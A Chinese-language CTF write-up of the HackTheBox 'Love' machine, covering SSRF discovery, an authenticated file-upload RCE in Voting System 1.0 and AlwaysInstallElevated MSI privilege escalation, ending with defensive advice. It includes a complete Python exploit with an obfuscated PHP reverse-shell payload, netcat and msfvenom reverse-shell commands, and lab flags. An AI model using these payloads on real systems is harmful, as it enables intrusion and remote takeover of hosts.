[Meachines] [Easy] Love File Scanner SSRF+Voting System RCE+Win注册表.MSI权限提升
字数 1913 2025-08-22 12:23:36

Windows渗透测试实战:从SSRF到MSI权限提升

1. 目标信息收集

1.1 初始扫描结果

目标IP: 10.10.10.239 (love.htb)

开放端口及服务:

  • 80/tcp: Apache httpd 2.4.46 (Voting System using PHP)
  • 135/tcp: Microsoft Windows RPC
  • 139/tcp: Microsoft Windows netbios-ssn
  • 443/tcp: Apache httpd 2.4.46 (SSL, commonName=staging.love.htb)
  • 445/tcp: Windows 10 Pro 19042 microsoft-ds
  • 3306/tcp: MySQL/MariaDB (限制连接)
  • 5000/tcp: Apache httpd 2.4.46
  • 5040/tcp: 未知服务
  • 5985/tcp: WinRM (Microsoft HTTPAPI httpd 2.0)
  • 5986/tcp: WinRM over SSL
  • 7680/tcp: 未知服务
  • 47001/tcp: Microsoft HTTPAPI httpd 2.0
  • 多个高端口: Microsoft Windows RPC

1.2 主机名发现

通过HTTPS证书发现:

  • 主域名: love.htb
  • 子域名: staging.love.htb

2. 漏洞利用路径

2.1 初始访问 - SSRF漏洞利用

  1. 修改本地hosts文件:

    10.10.10.239 love.htb staging.love.htb

  2. 访问子域名:

    • http://staging.love.htb/
    • http://staging.love.htb/beta.php (可能存在SSRF漏洞)

  3. 利用SSRF访问内部服务:

    • http://127.0.0.1:80

2.2 Voting System RCE漏洞利用

目标系统: Voting System 1.0 (PHP/MySQLi)

  1. 发现后台登录页面:

    • http://love.htb/admin/login.php
    • 默认凭据: admin:@LoveIsInTheAir!!!!

  2. 利用认证文件上传漏洞(Python脚本):

import requests

# 配置参数
IP = "love.htb"
USERNAME = "admin"
PASSWORD = "@LoveIsInTheAir!!!!"
REV_IP = "攻击者IP"
REV_PORT = "攻击者端口"

# 其他URL定义
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"

# PHP反向Shell payload
payload = """<?php
header('Content-type: text/plain');
$ip = "IIPP";
$port = "PPOORRTT";
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\windows\\temp";
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>"""
payload = payload.replace("IIPP", REV_IP)
payload = payload.replace("PPOORRTT", REV_PORT)

s = requests.Session()

def getCookies():
    r = s.get(INDEX_PAGE)
    return r.cookies

def login():
    cookies = getCookies()
    data = {
        "username":USERNAME,
        "password":PASSWORD,
        "login":""
    }
    r = s.post(LOGIN_URL, data=data, cookies=cookies)
    if r.status_code == 200:
        print("Logged in")
        return True
    else:
        return False

def sendPayload():
    if login():
        global payload
        payload = bytes(payload, encoding="UTF-8")
        files = {'photo':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) }
        data = {
            "firstname":"a",
            "lastname":"b",
            "password":"1",
            "add":""
        }
        r = s.post(VOTE_URL, data=data, files=files)
        if r.status_code == 200:
            print("Poc sent successfully")
        else:
            print("Error")

def callShell():
    r = s.get(CALL_SHELL, verify=False)
    if r.status_code == 200:
        print("Shell called check your listiner")

print("Start a NC listner on the port you choose above and run...")
sendPayload()
callShell()

  1. 执行步骤:

    • 启动Netcat监听器: nc -lvnp 8888
    • 运行上述Python脚本
    • 脚本会:
      • 使用默认凭据登录后台
      • 上传恶意PHP文件(伪装成图片)
      • 访问上传的文件触发反向Shell

  2. 获取初始权限:

    • 用户标志: bd7b936fc2e65edc3f4626d4690e85d1

3. 权限提升

3.1 检查AlwaysInstallElevated注册表项

  1. 检查注册表设置:

    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

    如果两者都设置为1,则可以利用MSI文件进行权限提升。

3.2 分析AppLocker策略

  1. 获取AppLocker有效规则:

    get-applockerpolicy -effective | select -expandproperty rulecollections

  2. 关键发现:

    • 允许所有用户运行数字签名的Windows Installer文件
    • 允许在%systemdrive%\Windows\Installer目录执行MSI文件
    • 允许本地管理员组运行所有Windows Installer文件
    • 拒绝在%OSDRIVE%\Administration\目录执行文件

3.3 生成并执行恶意MSI文件

  1. 使用msfvenom生成反向Shell MSI:

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=攻击者IP LPORT=443 -f msi -o rev.msi

  2. 执行MSI安装:

    msiexec /quiet /i rev.msi

    这将触发一个具有SYSTEM权限的反向Shell。

  3. 获取系统标志:

    • root.txt: 7b6783dd4065da252198f7ab8ddf64d1

4. 关键知识点总结

  1. SSRF漏洞利用:

    • 通过子域名发现内部服务
    • 利用SSRF绕过防火墙访问受限内部服务

  2. 认证文件上传RCE:

    • 识别易受攻击的Web应用(Voting System 1.0)
    • 利用默认凭据获取后台访问权限
    • 通过文件上传功能执行任意代码

  3. Windows权限提升技术:

    • AlwaysInstallElevated注册表项滥用
    • AppLocker策略绕过
    • MSI安装程序特权执行

  4. 横向移动技术:

    • 利用WinRM(5985/5986)进行远程管理
    • 通过SMB(445)共享枚举

5. 防御建议

  1. SSRF防护:

    • 限制内部服务访问
    • 验证用户提供的URL
    • 使用白名单而非黑名单

  2. Web应用安全:

    • 更改默认凭据
    • 实施文件上传验证
    • 定期更新第三方组件

  3. 权限提升防护:

    • 禁用AlwaysInstallElevated策略
    • 配置严格的AppLocker规则
    • 限制MSI安装权限

  4. 系统加固:

    • 关闭不必要的服务端口
    • 实施最小权限原则
    • 启用Windows Defender等安全解决方案
Windows渗透测试实战:从SSRF到MSI权限提升 1. 目标信息收集 1.1 初始扫描结果 目标IP: 10.10.10.239 (love.htb) 开放端口及服务: 80/tcp: Apache httpd 2.4.46 (Voting System using PHP) 135/tcp: Microsoft Windows RPC 139/tcp: Microsoft Windows netbios-ssn 443/tcp: Apache httpd 2.4.46 (SSL, commonName=staging.love.htb) 445/tcp: Windows 10 Pro 19042 microsoft-ds 3306/tcp: MySQL/MariaDB (限制连接) 5000/tcp: Apache httpd 2.4.46 5040/tcp: 未知服务 5985/tcp: WinRM (Microsoft HTTPAPI httpd 2.0) 5986/tcp: WinRM over SSL 7680/tcp: 未知服务 47001/tcp: Microsoft HTTPAPI httpd 2.0 多个高端口: Microsoft Windows RPC 1.2 主机名发现 通过HTTPS证书发现: 主域名: love.htb 子域名: staging.love.htb 2. 漏洞利用路径 2.1 初始访问 - SSRF漏洞利用 修改本地hosts文件: 访问子域名: http://staging.love.htb/ http://staging.love.htb/beta.php (可能存在SSRF漏洞) 利用SSRF访问内部服务: http://127.0.0.1:80 2.2 Voting System RCE漏洞利用 目标系统: Voting System 1.0 (PHP/MySQLi) 发现后台登录页面: http://love.htb/admin/login.php 默认凭据: admin:@LoveIsInTheAir!!!! 利用认证文件上传漏洞(Python脚本): 执行步骤: 启动Netcat监听器: nc -lvnp 8888 运行上述Python脚本 脚本会: 使用默认凭据登录后台 上传恶意PHP文件(伪装成图片) 访问上传的文件触发反向Shell 获取初始权限: 用户标志: bd7b936fc2e65edc3f4626d4690e85d1 3. 权限提升 3.1 检查AlwaysInstallElevated注册表项 检查注册表设置: 如果两者都设置为1,则可以利用MSI文件进行权限提升。 3.2 分析AppLocker策略 获取AppLocker有效规则: 关键发现: 允许所有用户运行数字签名的Windows Installer文件 允许在 %systemdrive%\Windows\Installer 目录执行MSI文件 允许本地管理员组运行所有Windows Installer文件 拒绝在 %OSDRIVE%\Administration\ 目录执行文件 3.3 生成并执行恶意MSI文件 使用msfvenom生成反向Shell MSI: 执行MSI安装: 这将触发一个具有SYSTEM权限的反向Shell。 获取系统标志: root.txt: 7b6783dd4065da252198f7ab8ddf64d1 4. 关键知识点总结 SSRF漏洞利用 : 通过子域名发现内部服务 利用SSRF绕过防火墙访问受限内部服务 认证文件上传RCE : 识别易受攻击的Web应用(Voting System 1.0) 利用默认凭据获取后台访问权限 通过文件上传功能执行任意代码 Windows权限提升技术 : AlwaysInstallElevated注册表项滥用 AppLocker策略绕过 MSI安装程序特权执行 横向移动技术 : 利用WinRM(5985/5986)进行远程管理 通过SMB(445)共享枚举 5. 防御建议 SSRF防护 : 限制内部服务访问 验证用户提供的URL 使用白名单而非黑名单 Web应用安全 : 更改默认凭据 实施文件上传验证 定期更新第三方组件 权限提升防护 : 禁用AlwaysInstallElevated策略 配置严格的AppLocker规则 限制MSI安装权限 系统加固 : 关闭不必要的服务端口 实施最小权限原则 启用Windows Defender等安全解决方案